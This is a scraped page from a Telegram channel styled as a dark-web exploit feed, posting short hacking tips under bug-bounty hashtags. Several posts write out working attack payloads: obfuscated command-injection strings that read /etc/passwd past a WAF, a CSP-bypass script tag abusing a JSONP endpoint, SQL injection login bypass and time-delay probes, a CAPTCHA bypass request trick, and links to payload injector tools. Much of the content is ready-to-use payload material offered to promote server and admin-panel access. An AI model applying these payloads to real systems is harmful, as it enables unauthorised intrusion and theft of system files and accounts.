0Day.Today | Learn Exploit | Zero World | Dark web |
@LearnExploit
19.6K subscribers
1.24K photos
128 videos
489 files
1.29K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
19.6K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
Top 25 Local File Inclusion (LFI) Parameters

#bugbounty #ethicalhacking
——————
0Day.Today
@LearnExploit
@Tech_Army
1.47K views
0Day.Today | Learn Exploit | Zero World | Dark web |
ways to bypass json web token controls

#bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army
1.39K views
0Day.Today | Learn Exploit | Zero World | Dark web |
RCE Parameters For newbie Bug Bounty Hunters

#bugbounty
——————‌
0Day.Today
@LearnExploit
@Tech_Army
1.89K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Not only crawling but you can do Subdomain Enumeration using Wayback.

curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u

#bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
1.89K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypassing Rate Limit Protection

Github

#bypass #bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7🔥1
1.59K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass Captcha (Google reCAPTCHA)

1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5
1.97K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
RCE WAF Bypass

;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?

#bugbounty #RCE #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
2.77K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
Payload Injector:

 Debinject:
😸 GitHub

 Pixload:
😸 GitHub

 Gospider:
😸 GitHub

#Injection #Hacking_Tool #BugBounty

BugCod3

🔥 0Day.Today
👤 T.me/LearnExploit
📢 T.me/Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
2.3K views
0Day.Today | Learn Exploit | Zero World | Dark web |
You can bypass CSP on any website that allows http://microsoft.com in a script-src

PoC: <script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>

This works because of the WordPress CSP bypass our engineer (octagon) found last year :

octagon.net

#BugBounty #bypass #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍5🤔2
2.56K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.

Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay

#VPD #BugBounty #security

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
52👍1🔥1
3.64K views